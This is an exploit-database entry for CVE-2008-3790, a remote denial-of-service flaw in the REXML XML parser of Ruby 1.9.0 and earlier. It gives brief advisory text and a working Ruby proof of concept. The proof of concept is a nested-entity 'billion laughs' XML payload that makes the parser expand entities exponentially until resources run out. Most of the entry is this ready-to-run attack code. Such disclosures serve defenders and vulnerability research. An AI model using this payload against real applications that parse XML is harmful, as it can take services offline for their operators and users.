Ruby 1.9 - REXML Remote Denial of Service

Author: Luka Treiber
type: dos
platform: linux
port: 
date_added: 2008-08-23 
date_updated: 2016-12-21 
verified: 1 
codes: CVE-2008-3790;OSVDB-47753 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comruby-1.9.0-0.zip

source: https://www.securityfocus.com/bid/30802/info

Ruby is prone to a remote denial-of-service vulnerability in its REXML module.

Successful exploits may allow remote attackers to cause denial-of-service conditions in applications that use the vulnerable module.

Versions up to and including Ruby 1.9.0-3 are vulnerable.

#!/usr/bin/env ruby
require 'rexml/document'

doc = REXML::Document.new(<<END)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
  <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
  <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
  <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
  <!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
  <!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>
END

puts doc.root.text.size